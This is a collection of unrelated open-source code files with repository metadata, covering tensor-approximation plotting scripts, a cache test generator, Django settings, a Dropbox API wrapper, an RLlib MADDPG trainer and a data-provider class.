plt.savefig(fname, dpi=parf['dpi'], pad_inches=parf['pad_inches'], bbox_inches='tight')
print('END plot memory')
##### END: figure 2 memory ###########
for dim in [3]:
sol_rank_range = sol_rank_range_set['{}'.format(dim)]
N = max(Ns['{}'.format(dim)])
xlimend = max(sol_rank_range_set['{}'.format(dim)])
##### BEGIN: figure 2 Memory efficiency ###########
for material in material_list:
plt.figure(num=None, figsize=parf['figsize'], dpi=parf['dpi'])
mem_GaNi=pickle.load(open("data_for_plot/dim_{}/mat_{}/mem_GaNi_{}.p".format(dim, material, N), "rb"))
plt.semilogy(sol_rank_range, mem_GaNi, lines['full'],
label=labels['GaNi{}'.format(('full'))],
markevery=1, markersize=7, markeredgewidth=1, markerfacecolor='None')
for kind in kinds['{}'.format(dim)]:
i = 0
for N in [max(Ns['{}'.format(dim)]), min(Ns['{}'.format(dim)])]:
mem_GaNi_Spar = pickle.load(open(
"data_for_plot/dim_{}/mat_{}/mem_GaNi_Spar_{}_{}_{}.p".format(dim, material, kind, N, solver),
"rb"))
plt.semilogy(sol_rank_range, mem_GaNi_Spar, lines['mem_{}'.format(kind_list[kind])][i],
label='{}{}'.format(labels['GaNi{}N'.format(kind_list[kind])], N),
markevery=1, markersize=7, markeredgewidth=1,
markerfacecolor='None')
i = i + 1
ax = plt.gca()
plt.xticks(sol_rank_range)
plt.xlabel(xlabel)
ax.set_xlim([0, xlimend])
plt.ylabel(ylabel)
plt.legend(loc='best')
fname = src + 'Memory_dim{}_mat{}{}'.format(dim, material, '.pdf')
print(('create figure: {}'.format(fname)))
plt.savefig(fname, dpi=parf['dpi'], pad_inches=parf['pad_inches'], bbox_inches='tight')
print('END plot memory')
##### END: figure 2 memory ###########
def plot_residuals():
data_folder = "data_for_plot/residua"
material_list, sol_rank_range_set, kinds, Ns, kind_list, solver=load_experiment_settings(
data_folder=data_folder)
xlabel = 'iteration'
ylabel = 'norm of residuum'
iter_rank_range_set = [1, 5, 10, 15, 20, 30, 40, 50]
if not os.path.exists('figures'):
os.makedirs('figures')
for dim in [2]:
xlimit = [0, 30]
ylimit = [10**-7, 10**-1]
for N in Ns['{}'.format(dim)]:
##### BEGIN: figure 5.1 Residuum for GA solution ###########
for material in material_list:
for kind in kinds['{}'.format(dim)]:
# plt.figure(1).clear()
parf = set_pars(mpl)
lines, labels = set_labels()
src = 'figures/' # source folder\
sol_rank_range = sol_rank_range_set['{}'.format(dim)]
plt.figure(num=None, figsize=parf['figsize'], dpi=parf['dpi'])
res_Ga_Spar = pickle.load(open(
"{}/dim_{}/mat_{}/res_Ga_Spar_{}_{}_{}.p".format(data_folder, dim, material, kind, N, solver),
"rb"))
for sol_rank in range(0, len(sol_rank_range)):
plt.semilogy(list(range(len(res_Ga_Spar[sol_rank]))), res_Ga_Spar[sol_rank],
lines['Ga'][sol_rank],
label='{} {}'.format(labels['Garank'], sol_rank_range[sol_rank]),
markevery=2)
ax = plt.gca()
plt.xticks(iter_rank_range_set)
plt.xlabel(xlabel)
ax.set_xlim(xlimit)
plt.ylabel(ylabel)
ax.set_ylim(ylimit)
plt.legend(loc='upper right')
fname = src + 'Residuum_dim{}_mat{}_kind_{}_Ga_{}_N{}{}'.format(dim, material, kind_list[kind],
solver, N, '.pdf')
print(('create figure: {}'.format(fname)))
plt.savefig(fname, dpi=parf['dpi'], pad_inches=parf['pad_inches'], bbox_inches='tight')
print('END Ga 2D residuum N={}'.format(N))
##### END: figure 5.1 Residuum for Ga solution ###########
##### BEGIN: figure 5.2 Residuum for GaNi solution ###########
for material in material_list:
for kind in kinds['{}'.format(dim)]:
parf = set_pars(mpl)
lines, labels = set_labels()
src = 'figures/' # source folder\
sol_rank_range = sol_rank_range_set['{}'.format(dim)]
plt.figure(num=None, figsize=parf['figsize'], dpi=parf['dpi'])
res_GaNi_Spar = pickle.load(
open("{}/dim_{}/mat_{}/res_GaNi_Spar_{}_{}_{}.p".format(data_folder, dim, material, kind, N,
solver), "rb"))
plt.xticks(iter_rank_range_set)
for sol_rank in range(0, len(sol_rank_range)):
plt.semilogy(list(range(len(res_GaNi_Spar[sol_rank]))), res_GaNi_Spar[sol_rank],
lines['GaNi'][sol_rank],
label='{} {}'.format(labels['GaNirank'], sol_rank_range[sol_rank]),
markevery=2, markersize=7,
markeredgewidth=1, markerfacecolor='None')
ax = plt.gca()
plt.xticks(iter_rank_range_set)
plt.xlabel(xlabel)
ax.set_xlim(xlimit)
plt.ylabel(ylabel)
ax.set_ylim(ylimit)
plt.legend(loc='upper right')
fname = src + 'Residuum_dim{}_mat{}_kind_{}_GaNi_{}_N{}{}'.format(dim, material, kind_list[kind],
solver, N, '.pdf')
print(('create figure: {}'.format(fname)))
plt.savefig(fname, dpi=parf['dpi'], pad_inches=parf['pad_inches'],
bbox_inches='tight')
print('END GaNi 2D residuum N={}'.format(N))
##### END: figure 5.2 Residuum for GaNi solution ###########
for dim in [3]:
xlimit = [0, 30]
ylimit = [10**-7, 10**-1]
for N in Ns['{}'.format(dim)]:
##### 0 material ###########
for material in material_list:
for kind in kinds['{}'.format(dim)]:
parf = set_pars(mpl)
lines, labels = set_labels()
src = 'figures/' # source folder\
sol_rank_range = sol_rank_range_set['{}'.format(dim)]
plt.figure(num=None, figsize=parf['figsize'], dpi=parf['dpi'])
res_Ga_Spar = pickle.load(
open(
"{}/dim_{}/mat_{}/res_Ga_Spar_{}_{}_{}.p".format(data_folder, dim, material, kind, N,
solver),
"rb"))
for sol_rank in range(0, len(
sol_rank_range)):
plt.semilogy(list(range(len(res_Ga_Spar[sol_rank]))), res_Ga_Spar[sol_rank],
lines['Ga'][sol_rank],
label='{} {}'.format(labels['Garank'], sol_rank_range[sol_rank]),
markevery=2)
ax = plt.gca()
plt.xticks(iter_rank_range_set)
plt.xlabel(xlabel)
ax.set_xlim(xlimit)
plt.ylabel(ylabel)
ax.set_ylim(ylimit)
plt.legend(loc='best')
fname = src + 'Residuum_dim{}_mat{}_kind_{}_Ga_{}_N{}{}'.format(dim, material, kind_list[kind],
solver, N, '.pdf')
print(('create figure: {}'.format(fname)))
plt.savefig(fname, dpi=parf['dpi'], pad_inches=parf['pad_inches'],
bbox_inches='tight')
print('END Ga 3D residuum N={} mat {}'.format(N, material))
##### END: figure 5.1 Residuum for Ga solution ###########
##### BEGIN: figure 5.2 Residuum for GaNi solution ###########
for material in material_list:
for kind in kinds['{}'.format(dim)]:
parf = set_pars(mpl)
lines, labels = set_labels()
src = 'figures/' # source folder\
sol_rank_range = sol_rank_range_set['{}'.format(dim)]
plt.figure(num=None, figsize=parf['figsize'], dpi=parf['dpi'])
# plt.hold(True)
res_GaNi_Spar = pickle.load(
open("{}/dim_{}/mat_{}/res_GaNi_Spar_{}_{}_{}.p".format(data_folder, dim, material, kind, N,
solver),
"rb"))
for sol_rank in range(0, len(sol_rank_range)): # range(len(sol_rank_range)):
plt.semilogy(list(range(len(res_GaNi_Spar[sol_rank]))), res_GaNi_Spar[sol_rank],
lines['GaNi'][sol_rank],
label='{} {}'.format(labels['GaNirank'], sol_rank_range[sol_rank]),
markevery=2, markersize=7,
markeredgewidth=1, markerfacecolor='None')
ax = plt.gca()
plt.xticks(iter_rank_range_set)
plt.xlabel(xlabel)
ax.set_xlim(xlimit)
plt.ylabel(ylabel)
ax.set_ylim(ylimit)
lg=plt.legend(loc='upper right')
fname=src+'Residuum_dim{}_mat{}_kind_{}_GaNi_{}_N{}{}'.format(dim, material, kind_list[kind],
solver, N, '.pdf')
print(('create figure: {}'.format(fname)))
plt.savefig(fname, dpi=parf['dpi'], pad_inches=parf['pad_inches'], bbox_inches='tight')
print('END GaNi 3D residuum N={} mat {}'.format(N, material))
##### END: figure 5.2 Residuum for GaNi solution ###########
def plot_time():
data_folder = "data_for_plot/time"
kind_list = ['cano', 'tucker', 'tt']
kinds = {'2': 0,
'3': 2, }
for material in [0, 3]:
for dim in [2, 3]:
kind = kinds['{}'.format(dim)]
xlabel = 'number of points - $ N $'
ylabel = 'time cost [s]'
if not os.path.exists('figures'):
os.makedirs('figures')
parf = set_pars(mpl)
lines, labels=set_labels()
src='figures/'
plt.figure(num=None, figsize=parf['figsize'], dpi=parf['dpi'])
N_list = pickle.load(
open("{}/dim_{}/mat_{}/N_list_{}.p".format(data_folder, dim, material,
kind_list[kind]), "rb"))
full_time_list = pickle.load(
open("{}/dim_{}/mat_{}/full_time_list_{}.p".format(data_folder, dim, material,
kind_list[kind]), "rb"))
sparse_time_list = pickle.load(
open("{}/dim_{}/mat_{}/sparse_time_list_{}.p".format(data_folder, dim, material,
kind_list[kind]),
"rb"))
plt.plot(N_list, full_time_list, lines['Gafull'], label='full', markevery=1,
markerfacecolor='None')
plt.plot(N_list, sparse_time_list, lines['GaSparse'], label='low-rank', markevery=1)
ax = plt.gca()
plt.xlabel(xlabel)
plt.ylabel(ylabel)
xlimit = [0, N_list[-1] + N_list[-1]/20]
ylimit = [0 - full_time_list[-1]*0.05, full_time_list[-1]*1.05]
ax.set_xlim(xlimit)
ax.set_ylim(ylimit)
plt.legend(loc='upper left')
fname=src+'time_efficiency_dim{}_mat{}_{}{}'.format(dim, material, kind_list[kind], '.pdf')
print(('create figure: {}'.format(fname)))
plt.savefig(fname, dpi=parf['dpi'], pad_inches=parf['pad_inches'], bbox_inches='tight')
print('END Ga time efficiency')
for material in [2, 4]:
kind_list = ['cano', 'tucker', 'tt']
kinds = {'2': 0,
'3': 2, }
for dim in [2, 3]:
kind = kinds['{}'.format(dim)]
xlabel = 'number of points - $ N $'
ylabel = 'time cost [s]'
if not os.path.exists('figures'):
os.makedirs('figures')
parf = set_pars(mpl)
lines, labels = set_labels()
src = 'figures/'
plt.figure(num=None, figsize=parf['figsize'], dpi=parf['dpi'])
N_list = pickle.load(
open("{}/dim_{}/mat_{}/N_list_{}.p".format(data_folder, dim, material, kind_list[kind]), "rb"))
full_time_list = pickle.load(
open("{}/dim_{}/mat_{}/full_time_list_{}.p".format(data_folder, dim, material, kind_list[kind]), "rb"))
sparse_time_list_1 = pickle.load(
open("{}/dim_{}/mat_{}/sparse_time_list_{}_1e-03.p".format(data_folder, dim, material, kind_list[kind]),
"rb"))
sparse_time_list_4 = pickle.load(
open("{}/dim_{}/mat_{}/sparse_time_list_{}_1e-06.p".format(data_folder, dim, material, kind_list[kind]),
"rb"))
plt.plot(N_list, full_time_list, lines['Gafull'], label='full', markevery=1, markerfacecolor='None')
plt.plot(N_list, sparse_time_list_1, lines['GaSparse'], label='low-rank, err $<$ 1e-3', markevery=1)
plt.plot(N_list, sparse_time_list_4, lines['GaSparse_4'], label='low-rank, err $<$ 1e-6', markevery=1)
ax = plt.gca()
plt.xlabel(xlabel)
plt.ylabel(ylabel)
xlimit = [0, N_list[-1] + N_list[-1]/20]
ylimit = [0 - full_time_list[-1]*0.05, full_time_list[-1]*1.05]
ax.set_xlim(xlimit)
ax.set_ylim(ylimit)
lg=plt.legend(loc='upper left')
fname=src+'time_efficiency_dim{}_mat{}_{}{}'.format(dim, material, kind_list[kind], '.pdf')
print(('create figure: {}'.format(fname)))
plt.savefig(fname, dpi=parf['dpi'], pad_inches=parf['pad_inches'], bbox_inches='tight')
print('END Ga time efficiency')
def display_data():
kind_list = ['cano', 'tucker', 'tt']
kinds = {'2': 0,
'3': 2, }
for material in [0, 3]:
for dim in [2, 3]:
kind = kinds['{}'.format(dim)]
N_list = pickle.load(
open("data_for_plot/time/dim_{}/mat_{}/N_list_{}.p".format(dim, material, kind_list[kind]), "rb"))
rank_list = pickle.load(
open("data_for_plot/time/dim_{}/mat_{}/rank_list_{}.p".format(dim, material, kind_list[kind]), "rb"))
full_time_list = pickle.load(
open("data_for_plot/time/dim_{}/mat_{}/full_time_list_{}.p".format(dim, material, kind_list[kind]), "rb"))
sparse_time_list = pickle.load(
open("data_for_plot/time/dim_{}/mat_{}/sparse_time_list_{}.p".format(dim, material, kind_list[kind]), "rb"))
print("dim={}, material={}, kind={} ".format(dim, material, kind_list[kind]))
print("N list {} ".format(N_list))
print("rank list {} ".format(rank_list))
print("tensorsLowRank time list {} ".format(sparse_time_list))
print("full time list {} ".format(full_time_list))
print()
for material in [2, 4]:
for dim in [2, 3]:
kind = kinds['{}'.format(dim)]
N_list = pickle.load(
open("data_for_plot/time/dim_{}/mat_{}/N_list_{}.p".format(dim, material, kind_list[kind]), "rb"))
rank_list_1 = pickle.load(
open("data_for_plot/time/dim_{}/mat_{}/rank_list_{}_1e-03.p".format(dim, material, kind_list[kind]), "rb"))
print("dim={}, material={}, kind={}, err_tol=1e-03 ".format(dim, material, kind_list[kind]))
print("N list {} ".format(N_list))
print("rank list {} ".format(rank_list_1))
print()
rank_list_2 = pickle.load(
open("data_for_plot/time/dim_{}/mat_{}/rank_list_{}_1e-06.p".format(dim, material, kind_list[kind]), "rb"))
print("dim={}, material={}, kind={}, err_tol=1e-06 ".format(dim, material, kind_list[kind]))
print("N list {} ".format(N_list))
print("rank list {} ".format(rank_list_2))
print()
for material in [0,3, 2, 4]:
for dim in [2, 3]:
kind = kinds['{}'.format(dim)]
N_list = pickle.load(
open("data_for_plot/time/dim_{}/mat_{}/N_list_{}.p".format(dim, material, kind_list[kind]), "rb"))
rank_list = pickle.load(
open("data_for_plot/time/dim_{}/mat_{}/full_solution_rank_list_{}.p".format(dim, material, kind_list[kind]), "rb"))
print("dim={}, material={}, kind={} ".format(dim, material, kind_list[kind]))
print("N list {} ".format(N_list))
print("full solution rank list {} ".format(rank_list))
print()
if __name__ == '__main__':
# data used in plot_time have to be genereted first by experiment_time_efficiency.py
# plot_time()
# data used in plot_error, plot_memory() and plot_residuals() have to be genereted first by diffusion_comparison.py
# plot_error()
# plot_memory()
# plot_residuals()
display_data()
|
{
"content_hash": "ef7a33ab43d5398e8fc5054c756a880b",
"timestamp": "",
"source": "github",
"line_count": 590,
"max_line_length": 131,
"avg_line_length": 47.54406779661017,
"alnum_prop": 0.47385119960072725,
"repo_name": "vondrejc/FFTHomPy",
"id": "182d8c766db772a953b29156289501d2e2e66aec",
"size": "28051",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "examples/lowRankTensorApproximations/plots.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "332845"
}
],
"symlink_target": ""
}
|
import sys
import random
from test_base import *
class TestBlockLD(TestBase):
def generate(self):
self.clear_tag()
for n in range(50000):
store_not_load = random.randint(0,1)
tag = random.randint(0, 15)
index = random.randint(0,self.sets_p-1)
taddr = self.get_addr(tag,index)
if store_not_load:
self.send_block_st(taddr)
else:
self.send_block_ld(taddr)
self.tg.done()
def send_block_st(self, addr):
base_addr = addr - (addr % (self.block_size_in_words_p*4))
for i in range(self.block_size_in_words_p):
self.send_sw(base_addr+(i*4))
# main()
if __name__ == "__main__":
t = TestBlockLD()
t.generate()
|
{
"content_hash": "a4ee5a1ea66db1d1582c56a60709a471",
"timestamp": "",
"source": "github",
"line_count": 35,
"max_line_length": 62,
"avg_line_length": 20.34285714285714,
"alnum_prop": 0.5898876404494382,
"repo_name": "litex-hub/pythondata-cpu-blackparrot",
"id": "b6ca139a678c7000c7bdb0593d9843845014384f",
"size": "712",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pythondata_cpu_blackparrot/system_verilog/black-parrot/external/basejump_stl/testing/bsg_cache/regression_non_blocking/test_block_ld.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C++",
"bytes": "9537"
},
{
"name": "M",
"bytes": "22703"
},
{
"name": "Makefile",
"bytes": "7964"
},
{
"name": "Objective-C",
"bytes": "71141"
},
{
"name": "Python",
"bytes": "77372"
},
{
"name": "Shell",
"bytes": "31543"
},
{
"name": "SystemVerilog",
"bytes": "1756892"
},
{
"name": "Tcl",
"bytes": "6548"
}
],
"symlink_target": ""
}
|
import os
# from logging.handlers import SysLogHandler
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
SECRET_KEY = 'k0zg0kibq7lv3$vcodk0*6g&nq8yzgue_wfxvai%k1yy@5=myd'
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = ['0.0.0.0']
# Application definition
INSTALLED_APPS = (
# 'django.contrib.admin',
# 'django.contrib.auth',
# 'django.contrib.contenttypes',
# 'django.contrib.sessions',
# 'django.contrib.messages',
# 'django.contrib.staticfiles',
'app',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
# 'django.middleware.csrf.CsrfViewMiddleware',
# 'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'ws.urls'
WSGI_APPLICATION = 'ws.wsgi.application'
DATABASES = {
'default': {
# 'ENGINE': 'django.db.backends.sqlite3',
# 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
STATIC_URL = '/static/'
|
{
"content_hash": "055cf79834775086188eb99152b3167c",
"timestamp": "",
"source": "github",
"line_count": 52,
"max_line_length": 65,
"avg_line_length": 23.096153846153847,
"alnum_prop": 0.6894254787676936,
"repo_name": "Mistchenko/Dockers",
"id": "07afbc0bc73fe795452a02dbae730b6d12d411f1",
"size": "1201",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "MQ/ws/ws/settings.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "10126"
},
{
"name": "Shell",
"bytes": "8842"
}
],
"symlink_target": ""
}
|
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class AccountInfo(Choreography):
def __init__(self, temboo_session):
"""
Create a new instance of the AccountInfo Choreo. A TembooSession object, containing a valid
set of Temboo credentials, must be supplied.
"""
super(AccountInfo, self).__init__(temboo_session, '/Library/Dropbox/Account/AccountInfo')
def new_input_set(self):
return AccountInfoInputSet()
def _make_result_set(self, result, path):
return AccountInfoResultSet(result, path)
def _make_execution(self, session, exec_id, path):
return AccountInfoChoreographyExecution(session, exec_id, path)
class AccountInfoInputSet(InputSet):
"""
An InputSet with methods appropriate for specifying the inputs to the AccountInfo
Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
"""
def set_AccessTokenSecret(self, value):
"""
Set the value of the AccessTokenSecret input for this Choreo. ((required, string) The Access Token Secret retrieved during the OAuth process.)
"""
super(AccountInfoInputSet, self)._set_input('AccessTokenSecret', value)
def set_AccessToken(self, value):
"""
Set the value of the AccessToken input for this Choreo. ((required, string) The Access Token retrieved during the OAuth process.)
"""
super(AccountInfoInputSet, self)._set_input('AccessToken', value)
def set_AppKey(self, value):
"""
Set the value of the AppKey input for this Choreo. ((required, string) The App Key provided by Dropbox (AKA the OAuth Consumer Key).)
"""
super(AccountInfoInputSet, self)._set_input('AppKey', value)
def set_AppSecret(self, value):
"""
Set the value of the AppSecret input for this Choreo. ((required, string) The App Secret provided by Dropbox (AKA the OAuth Consumer Secret).)
"""
super(AccountInfoInputSet, self)._set_input('AppSecret', value)
def set_ResponseFormat(self, value):
"""
Set the value of the ResponseFormat input for this Choreo. ((optional, string) The format that the response should be in. Can be set to xml or json. Defaults to json.)
"""
super(AccountInfoInputSet, self)._set_input('ResponseFormat', value)
class AccountInfoResultSet(ResultSet):
"""
A ResultSet with methods tailored to the values returned by the AccountInfo Choreo.
The ResultSet object is used to retrieve the results of a Choreo execution.
"""
def getJSONFromString(self, str):
return json.loads(str)
def get_Response(self):
"""
Retrieve the value for the "Response" output from this Choreo execution. (The response from Dropbox. Corresponds to the ResponseFormat input. Defaults to json.)
"""
return self._output.get('Response', None)
class AccountInfoChoreographyExecution(ChoreographyExecution):
def _make_result_set(self, response, path):
return AccountInfoResultSet(response, path)
|
{
"content_hash": "12db1d8c576906795e73238c3515020f",
"timestamp": "",
"source": "github",
"line_count": 76,
"max_line_length": 175,
"avg_line_length": 42.98684210526316,
"alnum_prop": 0.6954392408937864,
"repo_name": "jordanemedlock/psychtruths",
"id": "28734fcb19415cb6f867cce43033178e6cce96f6",
"size": "4131",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "temboo/core/Library/Dropbox/Account/AccountInfo.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "18544"
},
{
"name": "HTML",
"bytes": "34650"
},
{
"name": "JavaScript",
"bytes": "423"
},
{
"name": "PHP",
"bytes": "1097"
},
{
"name": "Python",
"bytes": "23444578"
}
],
"symlink_target": ""
}
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
"""Contributed port of MADDPG from OpenAI baselines.
The implementation has a couple assumptions:
- The number of agents is fixed and known upfront.
- Each agent is bound to a policy of the same name.
- Discrete actions are sent as logits (pre-softmax).
For a minimal example, see twostep_game.py, and the README for how to run
with the multi-agent particle envs.
"""
import logging
from ray.rllib.agents.trainer import with_common_config
from ray.rllib.agents.dqn.dqn import GenericOffPolicyTrainer
from ray.rllib.contrib.maddpg.maddpg_policy import MADDPGTFPolicy
from ray.rllib.optimizers import SyncReplayOptimizer
from ray.rllib.policy.sample_batch import SampleBatch, MultiAgentBatch
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
# yapf: disable
# __sphinx_doc_begin__
DEFAULT_CONFIG = with_common_config({
# === Settings for each individual policy ===
# ID of the agent controlled by this policy
"agent_id": None,
# Use a local critic for this policy.
"use_local_critic": False,
# === Evaluation ===
# Evaluation interval
"evaluation_interval": None,
# Number of episodes to run per evaluation period.
"evaluation_num_episodes": 10,
# === Model ===
# Apply a state preprocessor with spec given by the "model" config option
# (like other RL algorithms). This is mostly useful if you have a weird
# observation shape, like an image. Disabled by default.
"use_state_preprocessor": False,
# Postprocess the policy network model output with these hidden layers. If
# use_state_preprocessor is False, then these will be the *only* hidden
# layers in the network.
"actor_hiddens": [64, 64],
# Hidden layers activation of the postprocessing stage of the policy
# network
"actor_hidden_activation": "relu",
# Postprocess the critic network model output with these hidden layers;
# again, if use_state_preprocessor is True, then the state will be
# preprocessed by the model specified with the "model" config option first.
"critic_hiddens": [64, 64],
# Hidden layers activation of the postprocessing state of the critic.
"critic_hidden_activation": "relu",
# N-step Q learning
"n_step": 1,
# Algorithm for good policies
"good_policy": "maddpg",
# Algorithm for adversary policies
"adv_policy": "maddpg",
# === Replay buffer ===
# Size of the replay buffer. Note that if async_updates is set, then
# each worker will have a replay buffer of this size.
"buffer_size": int(1e6),
# Observation compression. Note that compression makes simulation slow in
# MPE.
"compress_observations": False,
# === Optimization ===
# Learning rate for the critic (Q-function) optimizer.
"critic_lr": 1e-2,
# Learning rate for the actor (policy) optimizer.
"actor_lr": 1e-2,
# Update the target network every `target_network_update_freq` steps.
"target_network_update_freq": 0,
# Update the target by \tau * policy + (1-\tau) * target_policy
"tau": 0.01,
# Weights for feature regularization for the actor
"actor_feature_reg": 0.001,
# If not None, clip gradients during optimization at this value
"grad_norm_clipping": 0.5,
# How many steps of the model to sample before learning starts.
"learning_starts": 1024 * 25,
# Update the replay buffer with this many samples at once. Note that this
# setting applies per-worker if num_workers > 1.
"sample_batch_size": 100,
# Size of a batched sampled from replay buffer for training. Note that
# if async_updates is set, then each worker returns gradients for a
# batch of this size.
"train_batch_size": 1024,
# Number of env steps to optimize for before returning
"timesteps_per_iteration": 0,
# === Parallelism ===
# Number of workers for collecting samples with. This only makes sense
# to increase if your environment is particularly slow to sample, or if
# you're using the Async or Ape-X optimizers.
"num_workers": 1,
# Prevent iterations from going lower than this time span
"min_iter_time_s": 0,
})
# __sphinx_doc_end__
# yapf: enable
def set_global_timestep(trainer):
global_timestep = trainer.optimizer.num_steps_sampled
trainer.train_start_timestep = global_timestep
def before_learn_on_batch(multi_agent_batch, policies, train_batch_size):
samples = {}
# Modify keys.
for pid, p in policies.items():
i = p.config["agent_id"]
keys = multi_agent_batch.policy_batches[pid].data.keys()
keys = ["_".join([k, str(i)]) for k in keys]
samples.update(
dict(
zip(keys,
multi_agent_batch.policy_batches[pid].data.values())))
# Make ops and feed_dict to get "new_obs" from target action sampler.
new_obs_ph_n = [p.new_obs_ph for p in policies.values()]
new_obs_n = list()
for k, v in samples.items():
if "new_obs" in k:
new_obs_n.append(v)
target_act_sampler_n = [p.target_act_sampler for p in policies.values()]
feed_dict = dict(zip(new_obs_ph_n, new_obs_n))
new_act_n = p.sess.run(target_act_sampler_n, feed_dict)
samples.update(
{"new_actions_%d" % i: new_act
for i, new_act in enumerate(new_act_n)})
# Share samples among agents.
policy_batches = {pid: SampleBatch(samples) for pid in policies.keys()}
return MultiAgentBatch(policy_batches, train_batch_size)
def make_optimizer(workers, config):
return SyncReplayOptimizer(
workers,
learning_starts=config["learning_starts"],
buffer_size=config["buffer_size"],
train_batch_size=config["train_batch_size"],
before_learn_on_batch=before_learn_on_batch,
synchronize_sampling=True,
prioritized_replay=False)
def add_trainer_metrics(trainer, result):
global_timestep = trainer.optimizer.num_steps_sampled
result.update(
timesteps_this_iter=global_timestep - trainer.train_start_timestep,
info=dict({
"num_target_updates": trainer.state["num_target_updates"],
}, **trainer.optimizer.stats()))
def collect_metrics(trainer):
result = trainer.collect_metrics()
return result
MADDPGTrainer = GenericOffPolicyTrainer.with_updates(
name="MADDPG",
default_config=DEFAULT_CONFIG,
default_policy=MADDPGTFPolicy,
before_init=None,
before_train_step=set_global_timestep,
make_policy_optimizer=make_optimizer,
after_train_result=add_trainer_metrics,
collect_metrics_fn=collect_metrics,
before_evaluate_fn=None)
|
{
"content_hash": "fd1881c36c4585e8aec978d703655ee2",
"timestamp": "",
"source": "github",
"line_count": 183,
"max_line_length": 79,
"avg_line_length": 36.84699453551912,
"alnum_prop": 0.6827821444460922,
"repo_name": "ujvl/ray-ng",
"id": "74f0cd2e4b245b96f5c41e2afd65b8208c35a4d3",
"size": "6743",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "rllib/contrib/maddpg/maddpg.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "349753"
},
{
"name": "C++",
"bytes": "6547"
},
{
"name": "CMake",
"bytes": "4927"
},
{
"name": "Makefile",
"bytes": "5285"
},
{
"name": "Python",
"bytes": "260095"
},
{
"name": "Shell",
"bytes": "6666"
}
],
"symlink_target": ""
}
|
from swgpy.object import *
def create(kernel):
result = Tangible()
result.template = "object/tangible/hair/bothan/shared_hair_bothan_male_s11.iff"
result.attribute_template_id = -1
result.stfName("hair_name","hair")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result
|
{
"content_hash": "300fa072a235781761740e8b080f3579",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 80,
"avg_line_length": 23.46153846153846,
"alnum_prop": 0.6918032786885245,
"repo_name": "obi-two/Rebelion",
"id": "179d44744e80076469f67be5696fa7835bc0a646",
"size": "450",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "data/scripts/templates/object/tangible/hair/bothan/shared_hair_bothan_male_s11.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "11818"
},
{
"name": "C",
"bytes": "7699"
},
{
"name": "C++",
"bytes": "2293610"
},
{
"name": "CMake",
"bytes": "39727"
},
{
"name": "PLSQL",
"bytes": "42065"
},
{
"name": "Python",
"bytes": "7499185"
},
{
"name": "SQLPL",
"bytes": "41864"
}
],
"symlink_target": ""
}
|
import numpy as n
from numpy.random import randn, rand, random_integers
import os
from util import *
BATCH_META_FILE = "batches.meta"
class DataProvider:
BATCH_REGEX = re.compile('^data_batch_(\d+)(\.\d+)?$')
def __init__(self, data_dir, batch_range=None, init_epoch=1, init_batchnum=None, dp_params={}, test=False):
if batch_range == None:
batch_range = DataProvider.get_batch_nums(data_dir)
if init_batchnum is None or init_batchnum not in batch_range:
init_batchnum = batch_range[0]
self.data_dir = data_dir
self.batch_range = batch_range
self.curr_epoch = init_epoch
self.curr_batchnum = init_batchnum
self.dp_params = dp_params
self.batch_meta = self.get_batch_meta(data_dir)
self.data_dic = None
self.test = test
self.batch_idx = batch_range.index(init_batchnum)
def get_next_batch(self):
if self.data_dic is None or len(self.batch_range) > 1:
self.data_dic = self.get_batch(self.curr_batchnum)
epoch, batchnum = self.curr_epoch, self.curr_batchnum
self.advance_batch()
return epoch, batchnum, self.data_dic
def __add_subbatch(self, batch_num, sub_batchnum, batch_dic):
subbatch_path = "%s.%d" % (os.path.join(self.data_dir, self.get_data_file_name(batch_num)), sub_batchnum)
if os.path.exists(subbatch_path):
sub_dic = unpickle(subbatch_path)
self._join_batches(batch_dic, sub_dic)
else:
raise IndexError("Sub-batch %d.%d does not exist in %s" % (batch_num,sub_batchnum, self.data_dir))
def _join_batches(self, main_batch, sub_batch):
main_batch['data'] = n.r_[main_batch['data'], sub_batch['data']]
def get_batch(self, batch_num):
if os.path.exists(self.get_data_file_name(batch_num) + '.1'): # batch in sub-batches
dic = unpickle(self.get_data_file_name(batch_num) + '.1')
sb_idx = 2
while True:
try:
self.__add_subbatch(batch_num, sb_idx, dic)
sb_idx += 1
except IndexError:
break
else:
dic = unpickle(self.get_data_file_name(batch_num))
return dic
def get_data_dims(self):
return self.batch_meta['num_vis']
def advance_batch(self):
self.batch_idx = self.get_next_batch_idx()
self.curr_batchnum = self.batch_range[self.batch_idx]
if self.batch_idx == 0: # we wrapped
self.curr_epoch += 1
def get_next_batch_idx(self):
return (self.batch_idx + 1) % len(self.batch_range)
def get_next_batch_num(self):
return self.batch_range[self.get_next_batch_idx()]
# get filename of current batch
def get_data_file_name(self, batchnum=None):
if batchnum is None:
